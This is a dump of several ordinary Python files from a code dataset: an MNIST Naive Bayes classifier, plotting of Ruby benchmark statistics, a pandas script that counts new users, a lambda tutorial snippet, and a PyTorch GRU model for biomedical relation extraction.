print(empty_index)\r\n\r\n index_to_remove = copy.deepcopy(empty_index)\r\n\r\n for x in empty_index:\r\n for y in range(height):\r\n if x * y not in index_to_remove:\r\n index_to_remove.append(x * y)\r\n\r\n index_to_remove = sorted(index_to_remove, reverse=True)\r\n\r\n for x in index_to_remove:\r\n width = int(math.sqrt(len(new_vector)))\r\n\r\n if width % 22 != 0:\r\n del new_vector[x]\r\n\r\n print(len(new_vector))\r\n\r\n return\r\n\r\n # The following will remove empty rows from each vector and tabulate\r\n # the different sizes generated. An empty column in this domain is\r\n # defined as a 28 consecutive non-black pixels who belong to\r\n # a unique horizontal line in the vector.\r\n def collect_vector_height_data(self):\r\n # The following ensures the process does not run without data\r\n if not self.training_list or not self.validation_list or not self.testing_list:\r\n print('Missing data to process, now configuring...')\r\n self.__initNB()\r\n\r\n # The following creates list\r\n print('Processing vector height...')\r\n\r\n process_list = [self.training_list, self.validation_list, self.testing_list]\r\n process_index = 0\r\n\r\n for list in process_list:\r\n for vector in list:\r\n empty_row = True\r\n empty_index = []\r\n\r\n new_vector = copy.deepcopy(vector)\r\n\r\n for x in range(len(new_vector)):\r\n if new_vector[x] == 1:\r\n empty_row = False\r\n\r\n # The following checks for empty lines above and bellow each vector\r\n if x != 0 and x % 28 == 0 and empty_row == True:\r\n empty_index.insert(0, x)\r\n elif x % 28 == 0 and empty_row == False:\r\n empty_row = True\r\n\r\n for index in empty_index:\r\n height = int(len(new_vector) / 28)\r\n\r\n if height % 22 != 0:\r\n del new_vector[index - 28: index]\r\n\r\n if process_index == 0:\r\n self.collected_training_list.append(new_vector)\r\n elif process_index == 1:\r\n self.collected_validation_list.append(new_vector)\r\n elif process_index == 2:\r\n self.collected_testing_list.append(new_vector)\r\n\r\n process_index += 1\r\n\r\n # The following will tabulate and display the different heights of the new vectors created\r\n \"\"\"\r\n print('Processing new vector lengths...\\n')\r\n collected_list = [self.collected_training_list, self.collected_validation_list, self.collected_testing_list]\r\n\r\n collected_lengths = [0 for x in 
range(29)]\r\n\r\n        for list in collected_list:\r\n            for vector in list:\r\n                height = int(len(vector) / 28)\r\n                collected_lengths[height] += 1\r\n\r\n                if height < 12:\r\n                    output = ''\r\n\r\n                    for x in range(len(vector)):\r\n                        if vector[x] != 0:\r\n                            output += '.'\r\n                        else:\r\n                            output += ' '\r\n\r\n                        if x % 28 == 0 and x != 0:\r\n                            print(output)\r\n                            output = ''\r\n\r\n                    print()\r\n\r\n\r\n        for x in range(len(collected_lengths)):\r\n            if collected_lengths[x] != 0:\r\n                print(\"Height: \" + str(x) + \"\\tfound: \" + str(collected_lengths[x]))\r\n        ## \"\"\"\r\n\r\n    ### END OF collect_vector_data() ###\r\n\r\n    #\r\n    def __initNB(self):\r\n        self.MNIST_OBJECT = MNIST_Processing()\r\n\r\n        self.training_list = self.MNIST_OBJECT.training_list\r\n        self.validation_list = self.MNIST_OBJECT.validation_list\r\n        self.testing_list = self.MNIST_OBJECT.testing_list\r\n\r\n        self.training_labels = self.MNIST_OBJECT.training_labels\r\n        self.validation_labels = self.MNIST_OBJECT.validation_labels\r\n        self.testing_labels = self.MNIST_OBJECT.testing_labels\r\n\r\n    ### END OF __initNB() ###\r\n\r\n    # The following is an implementation of Naive Bayes, processing a probability\r\n    # for each individual pixel in an image.\r\n    def train_bayes_v1(self):\r\n        # The following ensures data is present to process\r\n        if not self.training_list or not self.validation_list or not self.testing_list:\r\n            print('Missing data to process, now configuring...')\r\n            self.__initNB()\r\n\r\n        #\r\n        print('Training Naive Bayes algorithm with training list...\\n')\r\n        self.pixel_prob = [[0 for x in range(len(self.training_list[0]))] for y in range(10)]\r\n\r\n        # Essential variables\r\n        class_occ = [0 for x in range(10)]\r\n        pixel_occ_per_class = [[0 for x in range(len(self.training_list[0]))] for y in range(10)]\r\n        pixel_per_class = [0 for x in range(10)]\r\n        num_occ = 0\r\n\r\n        # The following records the number of pixels present and their independent occurrences\r\n        for x in range(len(self.training_list)):\r\n            class_occ[self.training_labels[x]] += 1\r\n\r\n            for y in range(len(self.training_list[x])):\r\n                if self.training_list[x][y] == 1:\r\n                    pixel_occ_per_class[self.training_labels[x]][y] += 1\r\n                    pixel_per_class[self.training_labels[x]] += 1\r\n\r\n        # The following creates a list of probabilities for each pixel in each class (add-one smoothing)\r\n        for x in range(len(pixel_occ_per_class)):\r\n            for y in range(len(pixel_occ_per_class[x])):\r\n                self.pixel_prob[x][y] = float(\r\n                    (pixel_occ_per_class[x][y] + 1) / (pixel_per_class[x] + len(self.training_list[0])))\r\n\r\n        for value in class_occ:\r\n            num_occ += value\r\n\r\n        for x in range(len(class_occ)):\r\n            self.class_prob[x] = float(class_occ[x] / num_occ)\r\n\r\n    ### END OF training_bayes_v1() ###\r\n\r\n    #\r\n    def run_bayes(self, list_to_test):\r\n        output_labels = []\r\n\r\n        for vector in list_to_test:\r\n            score = [math.log10(x) for x in self.class_prob]\r\n\r\n            for x in range(len(vector)):\r\n                if vector[x] == 1:\r\n                    for y in range(len(score)):\r\n                        score[y] += math.log10(self.pixel_prob[y][x])\r\n\r\n            output_labels.append(score.index(max(score)))\r\n\r\n        return output_labels\r\n\r\n    ### END OF run_bayes() ###\r\n\r\n    #\r\n    def test_accuracy(self, list_name, nm_labels, labels):\r\n        correct = 0\r\n        incorrect = 0\r\n        accuracy = 0.0\r\n\r\n        # Compare predicted and true labels index by index\r\n        for x in range(len(nm_labels)):\r\n            if nm_labels[x] == labels[x]:\r\n                correct += 1\r\n            else:\r\n                incorrect += 1\r\n\r\n        accuracy = int((correct / (correct + incorrect)) * 100)\r\n        print(list_name + ' results: ')\r\n        print('Correct: ' + str(correct),\r\n              '\\nIncorrect: ' + str(incorrect),\r\n              
'\\nAccuracy: ' + str(accuracy) + '\\n')\r\n\r\n ### END OF test_accuracy() ###\r\n\r\n #\r\n def print_number(self, num_to_display):\r\n for x in range(len(self.collected_training_list)):\r\n if self.training_labels[x] == num_to_display:\r\n\r\n print('Index: ' + str(x))\r\n output = ''\r\n\r\n for y in range(len(self.collected_training_list[x])):\r\n if self.collected_training_list[x][y] == 1:\r\n output += str(num_to_display)\r\n else:\r\n output += '-'\r\n\r\n if y % 28 == 0 and y != 0:\r\n print(output)\r\n output = ''\r\n\r\n print('\\n')\r\n ### END OF print_number() ###\r\n\r\n\r\n\"\"\" END OF MNIST_NaiveBayes() CLASS \"\"\"\r\n\r\nnaive_classifier = MNIST_NaiveBayes()\r\n\r\n","sub_path":"NaiveBayesMNISTV28.py","file_name":"NaiveBayesMNISTV28.py","file_ext":"py","file_size_in_byte":17707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279693584","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 13 19:38:43 2014\n\n@author: henrik\n\"\"\"\n\n\nclass MarkerPose:\n def __init__(self, x, y, theta, quality, order = None):\n self.x = x\n self.y = y\n self.theta = theta\n self.quality = quality\n self.order = order\n\n def scale_position(self, scale_factor):\n self.x = self.x * scale_factor\n self.y = self.y * scale_factor\n\n\n","sub_path":"MarkerPose.py","file_name":"MarkerPose.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467282535","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\n\nNOVERSION = None\nNOJUMP = -10\nTRIPLEPERFO = 18.69 * 3\ncrubyMeans = []\ncrubyStdDevs = []\ncrubyVersions = []\ncrubyVersionsLine = []\ncrubyVersionsLineX = []\ncrubyVersionsX = []\ncrubyJumps = []\n\nnewLineX = []\nnewLine = []\nnewLineV = []\n\nsortedCrubyJumps = []\njrubyMeans = []\njrubyStdDevs = []\njrubyVersions = []\njrubyJumps = []\nsortedJrubyJumps = []\n\nfor file in ['cruby_results2.csv', 'jruby_results_flags2.csv']:\n\n\twith open(file) as f:\n\n\t\tif file == 'cruby_results2.csv' :\n\t\t\treader = reversed(list(csv.reader(f, delimiter=',')))\n\t\telse :\n\t\t\treader = csv.reader(f, delimiter=',')\n\n\t\tif file == 'jruby_results_flags2.csv' :\n\t\t\t#try:\n\t\t\t#\treader = sorted(reader, key = lambda s: list(map(int, str(s[1])[6:].split('.'))))\n\t\t\t#except ValueError:\n\t\t\t#\tprint(\"x\")\n\t\t\t#\treader = sorted(reader, key = lambda s: list(map(int, str(s[1])[6:].split('.'))))\n\t\t\treader = sorted(reader, key = lambda s: list(map(int, ((str((s[1].split('-'))[1])).split('.'))[:3])))\n\t\t\n\t\tind = 0\n\t\tmax = 7\n\t\tmin = 2\n\t\tlocalMaxVersion = 0\n\t\tif file == 'cruby_results2_date.csv' :\n\t\t\tmax = 8\n\t\t\tmin = 3\n\n\t\tfor row in reader:\n\t\t\tind+=1\n\t\t\tif len(row) == max:\n\t\t\t\ttimes = []\n\t\t\t\tfor i in range(min, max):\n\t\t\t\t\ttimeString = row[i].split(\" \")[1]\n\t\t\t\t\ttimes.append(float(timeString))\n\n\t\t\t\t#Basic stats calculation\n\t\t\t\tif row[0] == \"cruby\":\n\t\t\t\t\tcrubyMeans.append(np.mean(times))\n\t\t\t\t\tcrubyStdDevs.append(np.std(times))\n\t\t\t\t\tcrubyVersions.append(row[1][5:])\n\t\t\t\t\t\n\t\t\t\t\tcrubyVersionsLine.append(np.mean(times))\n\t\t\t\t\tif file == 'cruby_results2_date.csv' :\n\t\t\t\t\t\tcrubyVersionsLineX.append(int(row[2]))\n\t\t\t\t\t\tcrubyVersionsX.append(int(row[2]))\n\t\t\t\t\t\tif int(row[1][7]) >= localMaxVersion:\n\t\t\t\t\t\t\tlocalMaxVersion = 
int(row[1][7])\n\t\t\t\t\t\t\tnewLineX.append(int(row[2]))\n\t\t\t\t\t\t\tnewLine.append(np.mean(times))\n\t\t\t\t\t\t\tnewLineV.append(row[1])\n\t\t\t\t\telse :\n\t\t\t\t\t\tcrubyVersionsLineX.append(ind)\n\t\t\t\t\t\tif int(row[1][7]) > 2 or (int(row[1][7]) == 2 and int(row[1][9]) >= 6) or (int(row[1][7]) == 2 and len(row[1]) == 11) :\n\t\t\t\t\t\t\tnewLineX.append(ind-1)\n\t\t\t\t\t\t\tnewLine.append(np.mean(times))\n\t\t\t\t\t\t\tnewLineV.append(row[1])\n\n\t\t\t\telse:\n\t\t\t\t\tjrubyMeans.append(np.mean(times))\n\t\t\t\t\tjrubyStdDevs.append(np.std(times))\n\t\t\t\t\tjrubyVersions.append(row[1])\n\t\t\t\ttimes.clear\n\t\t\telse:\n\t\t\t\tif row[0] == \"cruby\":\n\t\t\t\t\tcrubyMeans.append(NOVERSION)\n\t\t\t\t\tcrubyStdDevs.append(NOVERSION)\n\t\t\t\t\tcrubyVersions.append(row[1][5:])\n\t\t\t\t\tif file == 'cruby_results2_date.csv' :\n\t\t\t\t\t\tcrubyVersionsX.append(int(row[2]))\n\t\t\t\telse:\n\t\t\t\t\tjrubyMeans.append(NOVERSION)\n\t\t\t\t\tjrubyStdDevs.append(NOVERSION)\n\t\t\t\t\tjrubyVersions.append(\"x\")\n\n#Get Jump Values\ncrubyJumps.append(NOJUMP)\nfor i in range(1, len(crubyMeans)) :\n\tif (crubyMeans[i] != NOVERSION and crubyMeans[i-1] != NOVERSION) :\n\t\tcrubyJumps.append(crubyMeans[i] - crubyMeans[i-1])\n\t\t#if crubyMeans[i] < crubyMeans[i-1] :\n\t\t\t#print(\"Version {}, value: {}\".format(crubyVersions[len(crubyJumps)-1], crubyMeans[i] - crubyMeans[i-1]))\n\telse : \n\t\tcrubyJumps.append(NOJUMP)\n\n#Finding max jump versions\nprint(\"cRuby:\")\nsortedCrubyJumps = crubyJumps.copy()\nsortedCrubyJumps.sort()\nfor i in range(0, 10) :\n\tjumpVal = sortedCrubyJumps[i]\n\tprint(jumpVal, end=', ')\n\tprint(crubyVersions[crubyJumps.index(jumpVal)])\n\n\n#Linear INterpolation\n#xValsCruby = []\n\n#for i in range(0, len(crubyVersions)) :\n#\txValsCruby.append(i)\n\n#true if dates\nif True :\n\tm, b = np.polyfit(newLineX, newLine, 1)\nelse:\n\tm, b = np.polyfit(crubyVersionsLineX, crubyVersionsLine, 1)\n\ncrubyLine = []\n\nfor i in crubyVersionsLineX :\n\tcrubyLine.append(m*i + b)\n\n#When to reach triple performance?\n\n\n\ngoalVersion = (73.05055-b)/m\n#goalVersion = (2*b)/m\nprint(\"formula is y={}x + {}\".format(m, b))\nprint(\"We wil reach 3x3 goal at version {}.\".format(goalVersion))\nprint(\"This is in {} versions.\".format(goalVersion-crubyVersionsLineX[len(crubyVersionsLineX)-1]))\nprint()\n\n#All manipulations done\nCST=6\n\ncrubyX = [int(i)*CST for i in np.arange(0, len(crubyVersions)/CST)]\ncrubyVersionsPlot = (itemgetter(*crubyX)(crubyVersions))\n\nallXs = [i for i in range(2131)]\n\nplt.figure(figsize=(10, 7.6))\nplt.plot(crubyMeans, 'ro', markersize=12) #NODATE\n#plt.plot(crubyVersionsX, crubyMeans, 'ro', markersize=12) #DATE\n#plt.plot(newLineX, newLine, 'go', markersize=12, markeredgewidth=2, markeredgecolor='g') #MAYBE\nplt.plot(crubyVersionsLineX, crubyLine, linewidth=6, alpha=0)\nplt.yticks(fontsize=17)\nplt.xticks(fontsize=17)\nplt.xticks(rotation=45, ha='right', fontsize=17) #NODATE\nplt.xticks(crubyX, crubyVersionsPlot) #NODATE\n#plt.xlabel(\"Time Since Original Version (days)\", fontsize=24) #DATE\nplt.xlabel(\"cRuby Versions\", fontsize=24) #NODATE\nplt.ylabel(\"Performance (fps)\", fontsize=24)\n#plt.title()\nplt.ylim(bottom=21)\nplt.tight_layout()\nplt.savefig(\"figRubyMeans.png\")\nplt.show()\nplt.clf()\n\nplt.plot(crubyStdDevs, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(crubyX, crubyVersionsPlot)\nplt.savefig(\"figRubyStdDevs.png\")\nplt.clf()\n\nplt.plot(crubyJumps, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(crubyX, 
crubyVersionsPlot)\nplt.savefig(\"figRubyJumps.png\")\nplt.clf()\n\njrubyX = [int(i)*CST for i in np.arange(0, len(jrubyVersions)/CST)]\njrubyVersionsPlot = itemgetter(*jrubyX)(jrubyVersions)\n\nplt.plot(jrubyMeans, 'ro')\nplt.xticks(rotation=30)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyMeans.png\")\nplt.clf()\n\nplt.plot(jrubyStdDevs, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyStdDevs.png\")\nplt.clf()\n\nplt.plot(jrubyJumps, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyJumps.png\")\nplt.clf()\n\t","sub_path":"statsC.py","file_name":"statsC.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"108484524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom pandas import DataFrame, Series\nfrom tools.con_mysql import create_con\n\n# import pymysql\nimport pandas as pd\n\n\ncon = create_con()\nsql = \"select * from dd_user\"\ndf = pd.read_sql(sql, con)\n\n\nimport time\ndef change_time(t):\n    timeStamp = t\n    timeArray = time.localtime(timeStamp)\n    otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n    return otherStyleTime\n\n\n# This step overwrites the original join_time data in df\ndf['join_time'] = Series([change_time(x) for x in df['join_time']])\n\n# Creates a new Series of datetimes\ndt = pd.to_datetime(df['join_time'])\n\n\ndf2 = DataFrame(df['id'])\ndf2.set_index(dt)\ndf2.insert(0, 'date', dt)\ndf3 = df2.set_index(df2['date'])\ndf4 = df3.drop(['date'], axis=1)\ndf4['2018-08'].groupby('id')\n\n\ns = pd.Series(df4['id'], index=df4.index)\n# print(type(s))\nprint(s.head(2))\n\n# s can be sliced by date to select the desired time window: hour, day or month\ns['2018-08-13 00'].count()  # number of new users in the hour '2018-08-13 00'\n\n\n# Hourly new-user counts for the given day (for plotting)\ndef draw_trend_hour(stime):\n    x = []\n    y = []\n    for i in range(24):\n        st = \"%02d\" % i\n        x.append(st)\n        ss = stime+' ' + st\n        y.append(s[ss].count())\n    return (x,y)\n\n# Daily new-user counts for the last seven days (for plotting)\ndef draw_trend_weeks(stime):\n    x = []\n    y = []\n    for i in range(29-7,29):\n        st = \"%02d\" % i\n        x.append(st)\n        ss = stime+'-' + st\n        y.append(s[ss].count())\n    return (x,y)\n\nstime = '2018-8-13'\n\nx,y = draw_trend_hour(stime)\ny_sum = sum(y)\n# x1,y1 = draw_trend_weeks(stime)\n\n\nfrom tools.con_mysql import judge_new_user\nfrom tools.my_sql import insert_new_user\nsql = insert_new_user(y, stime, y_sum)\n\n\njudge_new_user(stime, sql)\n\n\n# from tools.draw_chart import draw_new_days\n# # draw_new_days(x,y)","sub_path":"novel_analysis/new_user_trend.py","file_name":"new_user_trend.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"373616052","text":"items = [\n    ('product 1', 46),\n    ('product 2', 12),\n    ('product 3', 34),\n    ('product 4', 9),\n]\n\n# items.sort(key=lambda item: item[1])\n# print(items)\n\n# filtered = list(filter(lambda item: item[1] >= 14, items))\n# print(filtered)\n\n# comprehension: [expression for item in items]\nprices = [item for item in items if item[1] >= 14]\nprint(prices)\n","sub_path":"Mosh Python Course/Hello world/Lambda_function.py","file_name":"Lambda_function.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"424474639","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd 
import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom collections import defaultdict\nimport time\nimport argparse\n\nfrom LoadDataVariables import *\nfrom maxLen import maxLen\nfrom prf import prf\n\npositinoVecLen = 10\nbatchSize = 200\nwordVectorLength = 100\nvectorLength = wordVectorLength + 2 * positinoVecLen\nhopNumber = 2\nclassNumber = 2\nnum_epoches = 200\nhiddenSize = 200\nentityVecSize = 100\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--fold\", default=\"1\")\nargs = parser.parse_args()\nfoldN = args.fold\n\nresultOutput = '/home/laboratory/lab/BioCreative/2017/BC6/GRU_mulInstace/'\nif not os.path.exists(resultOutput):\n os.makedirs(resultOutput)\n\nprint(\"Load word id...\")\nword2id = LoadWord2id(\"/home/laboratory/corpus/en_vectorTable/bio-word2id100\")\nprint(\"Load word vectors...\")\nten = np.loadtxt(\"/home/laboratory/corpus/en_vectorTable/bio-embed100\")\nembed = nn.Embedding(ten.shape[0], wordVectorLength)\nembed.weight = torch.nn.Parameter(torch.FloatTensor(ten), requires_grad=True)\n\nprint(\"Load entity vectors...\")\nentity2vector = np.loadtxt(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/entity2vec.vec.new\")\nentityEmbed = nn.Embedding(entity2vector.shape[0], entity2vector.shape[1])\nentityEmbed.weight = torch.nn.Parameter(torch.FloatTensor(entity2vector), requires_grad=True)\n\nprint(\"Load relation vectors...\")\n#relation2vector = LoadRelationVectors(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/relation2vec.vec\", wordVectorLength)\nrelation2vector = np.loadtxt(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/relation2vec.vec\")\nrelationEmbed = nn.Embedding(relation2vector.shape[0], relation2vector.shape[1])\nrelationEmbed.weight = torch.nn.Parameter(torch.FloatTensor(relation2vector), requires_grad=True)\n\nprint(\"Load triples...\") \ntriples = LoadTriples(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/data/triple2id.txt\")\nprint(\"Load entity id mapping...\")\nentity2id = LoadEntity2Id(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/data/entity2id.txt.new\")\n\ntrainPath = \"/home/laboratory/lab/BioCreative/2017/BC6/corpus_train\"+foldN+\".txt.mulInstance\"\ntestsPath = \"/home/laboratory/lab/BioCreative/2017/BC6/corpus_test\"+foldN+\".txt.mulInstance\"\nprint(\"Load train samples...\")\ntrainSet = LoadMulInstanceSamples(trainPath)\nprint(\"Load test samples...\")\ntestSet = LoadMulInstanceSamples(testsPath)\n\nmaxlen = max([maxLen(trainPath), maxLen(testsPath)])\npositionVar = nn.Embedding(maxlen * 2, positinoVecLen)\n\n# conv1 = nn.Conv2d(1, 1, (1, 3), stride=1, padding=(0, 1), bias=True)\n# conv2 = nn.Conv2d(1, 1, (1, 4), stride=1, padding=(0, 1), bias=True)\n# conv3 = nn.Conv2d(1, 1, (1, 5), stride=1, padding=(0, 2), bias=True)\nWr = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, vectorLength))), requires_grad=True)\nUr = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nW = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, vectorLength))), requires_grad=True)\nU = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nWz = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, vectorLength))), requires_grad=True)\nUz = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nWentity = 
Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, entityVecSize))), requires_grad=True)\n\nsoftmaxLayer_W = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (classNumber, hiddenSize*1))), requires_grad=True)\nsoftmaxLayer_b = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (classNumber, 1))), requires_grad=True)\nattention_w = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (entityVecSize, hiddenSize))), requires_grad=True)\n#rnn = nn.GRU(vectorLength, hiddenSize, dropout=0.5, bidirectional=False)\nsoftmax = torch.nn.Softmax()\nloss_function = torch.nn.NLLLoss()\n\ndef RNN(mulInstance, e1, e2, relation):\n rnnOut = []\n instanceLength = len(mulInstance)\n e1 = entityEmbed(e1).transpose(0,1)\n e2 = entityEmbed(e2).transpose(0,1)\n if relation.data.numpy()[0] == -1:\n relation = Variable(torch.zeros(entityVecSize, 1))\n else:\n relation = relationEmbed(relation).transpose(0,1)\n for instance in mulInstance:\n contxtWords, sentLength, offsetE1, offsetE2, p1, p2 = instance\n positionsE1 = positionVar(offsetE1)\n positionsE2 = positionVar(offsetE2)\n contxtWords = embed(contxtWords)\n contxtWords = torch.cat([contxtWords, positionsE1, positionsE2], 1)\n\n outputs = []\n pre_h = Variable(torch.zeros(hiddenSize, 1))\n for i in range(sentLength):\n xi = contxtWords[i].view(vectorLength, 1)\n # ri = σ(Wr * xi + Ur*hi−1)\n ri = torch.sigmoid(torch.mm(Wr, xi) + torch.mm(Ur, pre_h))\n # h~i = Φ(W * xi + U * (ri ⊗ hi−1))\n hh = torch.tanh(torch.mm(W, xi) + torch.mm(U, ri * pre_h))\n # zi = σ(Wz * xi + Uz * hi−1)\n zi = torch.sigmoid(torch.mm(Wz, xi) + torch.mm(Uz, pre_h))# + torch.mm(Wentity, e1) + torch.mm(Wentity, e2))\n # hi = zi ⊗ hi−1 + ((1; 1; :::; 1)T − zi) ⊗ h~i\n hi = zi * pre_h + (1.0 - zi) * hh\n\n outputs.append(hi)\n pre_h = hi\n output = torch.cat(outputs, 1)\n #output, hn = rnn(contxtWords.view(sentLength, 1, vectorLength))\n\n #output = output.view(sentLength, hiddenSize*1).transpose(0,1)\n output = torch.max(output,1)[0]\n rnnOut.append(output)\n contxtWords = torch.cat(rnnOut, 1)\n alpha = softmax(torch.mm(relation.transpose(0,1), torch.mm(attention_w, contxtWords))).transpose(0,1)\n output = torch.mm(contxtWords, alpha)\n finallinearLayerOut = torch.mm(softmaxLayer_W, output) + softmaxLayer_b\n \n return finallinearLayerOut.transpose(0,1)\n\ndef lossModel(mulInstance, e1V, e2V, relation, label):\n finallinearLayerOut = RNN(mulInstance, e1V, e2V, relation)\n\n log_prob = F.log_softmax(finallinearLayerOut)\n total_loss = loss_function(log_prob, Variable(torch.LongTensor([label])))\n calssification = softmax(finallinearLayerOut)\n\n return total_loss, calssification\n\ndef testModel(mulInstance, e1V, e2V, relation):\n finallinearLayerOut = RNN(mulInstance, e1V, e2V, relation)\n \n calssification = softmax(finallinearLayerOut)\n\n return calssification\n\nparameters = [softmaxLayer_W,\n softmaxLayer_b,\n Wr, Ur, W, U, Wz, Uz, attention_w]\nparameters.append(positionVar.weight)\nparameters.append(relationEmbed.weight)\nparameters.append(embed.weight)\n# parameters.append(entityEmbed.weight)\n#parameters = parameters + list(conv1.parameters()) + list(conv2.parameters())+ list(conv3.parameters())\noptimizer = optim.Adam(parameters, lr = 0.01, weight_decay=0.1)\n\ndef GetPosition(sentence):\n pos = []\n items = sentence.split(\" \")\n n = len(items)\n\n posForSentE1 = list(range(1, n-1))\n posForSentE2 = list(range(-n+2, 0))\n\n return posForSentE1, posForSentE2, 0, n-1\n\ndef GetSampleProperty(samples):\n mulInstance = []\n label = 0\n e1ID = None\n 
e1V = None \n e2ID = None\n e2V = None\n relation = None\n \n for sample in samples:\n sentid = sample[0]\n posForSentE1, posForSentE2, posE1, posE2 = GetPosition(sample[1])\n words = sample[1].split(\" \")\n n = len(words) - 2\n \n offsetE1 = Variable(torch.LongTensor([index + maxlen for index in posForSentE1]))\n offsetE2 = Variable(torch.LongTensor([index + maxlen for index in posForSentE2]))\n contxtWords = Variable(torch.LongTensor([word2id[words[i]] for i in range(0, n)]))\n\n e1ID = sample[2]\n e1 = entity2id[e1ID]\n\n e2ID = sample[3]\n e2 = entity2id[e2ID]\n\n e1V = Variable(torch.LongTensor([int(e1)]))\n e2V = Variable(torch.LongTensor([int(e2)]))\n\n pairStr0 = str(e1) + \"_\" + str(e2)\n pairStr1 = str(e2) + \"_\" + str(e1)\n if pairStr0 in triples:\n relation = Variable(torch.LongTensor([ int(triples[pairStr0]) ]))\n elif pairStr1 in triples:\n relation = Variable(torch.LongTensor([ int(triples[pairStr1]) ]))\n #e1V, e2V = e2V, e1V\n else:\n relation = Variable(torch.LongTensor([-1]))\n # relation = (e2V - e1V)\n # if e1ID == e2ID:\n # e1V = torch.cat([entity2vector[\"reserved\"], positionVar[0], positionVar[posE2 - posE1]])\n label = int(sample[5])\n mulInstance.append((contxtWords, n, offsetE1, offsetE2, posE1, posE2))\n return mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label\n\ndef test(testSet, resultStream=None, probPath=None):\n count = 0\n correct = 0\n time0 = time.time()\n probs = []\n for sample in testSet:\n mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label = sample\n\n calssification = testModel(mulInstance, e1V, e2V, relation)\n prob = calssification.data.numpy().reshape(classNumber)\n predict = np.argmax(prob)\n probs.append(prob)\n if resultStream and predict == 1:\n resultStream.write(\"\\t\".join([sentid, e1ID, e2ID]) + \"\\n\")\n\n if predict == label:\n correct += 1.0\n count += 1\n if probPath:\n np.savetxt(probPath, probs, '%.5f',delimiter=' ')\n time1 = time.time()\n acc = correct/count\n print(\"test Acc: \", acc)\n print(\"time : \", str(time1 - time0))\n return acc\n #np.savetxt(resultOutput + \"predict_\" + str(epoch_idx) + \".txt\", np.asarray(results, dtype=np.float32), fmt='%.5f',delimiter=' ')\n\ntrainset = []\nfor sample in trainSet:\n sampleTuple = GetSampleProperty(sample)\n trainset.append(sampleTuple)\n\ntestset = []\nfor sample in testSet:\n sampleTuple = GetSampleProperty(sample)\n testset.append(sampleTuple)\n\ntrainsetSize = len(trainset)\nvalidationSet = trainSet[trainsetSize:]\nvalidationSize = len(validationSet)\n\nmaxacc = 0\nmaxp = 0\nmaxr = 0\nmaxf = 0\ngoldPath = \"/home/laboratory/lab/BioCreative/2017/BC6/bc2_ips_pmid2ppi_test\"+foldN+\".txt\"\nfor epoch_idx in range(num_epoches):\n \n np.random.shuffle(trainset)\n sum_loss= Variable(torch.Tensor([0]))\n print(\"=====================================================================\")\n print(\"epoch \" + str(epoch_idx) + \", trainSize: \" + str(trainsetSize) + \", validationSize: \" + str(validationSize))\n print(\"hop size: \", str(hopNumber))\n\n count = 0\n correct = 0\n time0 = time.time() \n optimizer.zero_grad() \n for sample in trainset:\n mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label = sample\n total_loss, calssification = lossModel(mulInstance, e1V, e2V, relation, label)\n sum_loss = torch.add(sum_loss, total_loss)\n\n predict = np.argmax(calssification.data.numpy())\n if predict == label:\n correct += 1.0\n count += 1\n\n####################Update#######################\n if count % batchSize == 0:\n sum_loss.backward()\n 
